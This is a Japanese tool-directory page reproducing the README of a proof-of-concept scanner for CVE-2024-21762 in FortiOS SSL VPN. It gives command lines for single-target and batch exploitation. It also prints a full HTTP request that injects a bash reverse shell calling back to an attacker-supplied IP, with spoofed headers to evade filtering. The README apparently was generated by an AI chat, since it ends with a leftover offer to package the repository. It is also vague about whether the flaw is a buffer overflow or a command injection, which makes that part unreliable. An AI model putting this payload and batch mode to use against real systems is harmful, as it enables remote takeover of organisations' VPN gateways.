Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21762_FortiNet_PoC — FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントを標的とし、リバースシェルペイロードを配信する CVE-2024-21762 向け概念実証 (PoC) スキャナ。 | Kitploit
ツール/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントを標的とし、リバースシェルペイロードを配信する CVE-2024-21762 向け概念実証 (PoC) スキャナ。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2121年前未レビュー

CVE-2024-21762_FortiNet_PoC

FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントの CVE-2024-21762 を標的とし、リバースシェルペイロードを配信する Proof-of-Concept スキャナ。

こちらは、プロジェクト用のGitHub スタイルの解説記事です。簡潔で明瞭なサマリー、使用方法ガイド、そして CVE との関連性に関する文脈が含まれています。


🔥 プロジェクトタイトル: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 サマリー(GitHub の説明文用):

FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントの CVE-2024-21762 を標的とし、リバースシェルペイロードを配信する Proof-of-Concept スキャナ。


📜 概要

この Python スクリプトは、Fortinet の FortiOS SSL VPN インターフェースと対話するように設計された PoC(Proof of Concept)ツールで、/remote/hostcheck_validate エンドポイントのCVE-2024-21762(スタックベースのバッファオーバーフローまたはコマンドインジェクションの脆弱性)を標的としています。

免責事項: これは教育目的および許可を得たテスト目的のみで使用してください。


🧬 動作原理

  • FortiGate SSL VPN インターフェースの /remote/hostcheck_validate に細工した POST リクエストを送信します。
  • シミュレートされた脆弱なパラメータ(host)にbash リバースシェルペイロードを注入します。
  • 偽装したヘッダー(User-Agent、Cookie)を使用して、FortiOS の表面的なリクエストフィルタリングを回避します。
  • サーバーの応答を受信してログに記録し、エクスプロイトの成功を評価します。
  • ファイル入出力の自動化とプログレスバーを備えた単一またはバッチターゲットテストをサポートします。

🛠️ 特徴

  • 🧪 制御されたフォームフィールドによるリバースシェルペイロードの注入
  • 🧾 分析用の完全な HTTP 応答のキャプチャ(last_response.txt)
  • 📊 単一/バッチモードでの進行状況を追跡するプログレスバー
  • 🗃️ 入出力ファイルをサポートするバッチモード
  • 🔄 モジュール式で拡張可能

⚙️ 必要条件

  • Python 3.6+
  • プログレス表示用の tqdm

依存関係をインストール:

root@kitploit:~
pip install tqdm

🚀 使用方法

単一ターゲットモード

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

バッチモード

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: IP:PORT 形式のターゲットリスト(1 行に 1 つ)
  • results.txt: エクスプロイト試行の出力ログ

📥 送信されるペイロード例

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 ログ

このツールは、各試行の完全な HTTP 応答を次のファイルに書き込みます:

root@kitploit:~
last_response.txt

これを使用して、リクエストが解析されたか、拒否されたか、エラーコードが返されたかを確認します。


⚠️ 法的注意

このコードは教育目的および許可を得たテスト目的のみで提供されます。所有していない、または明示的なテスト許可を得ていないネットワークやシステムでは使用しないでください。


✍️ 作成者

Carter — サイバーセキュリティエンジニア、Red/Purple Team 愛好家、PoC 自動化オタク。


これを GitHub にプッシュできる README.md ファイル+リポジトリ構成にパッケージ化しますか? 次にそれを生成できます。

ツールをダウンロード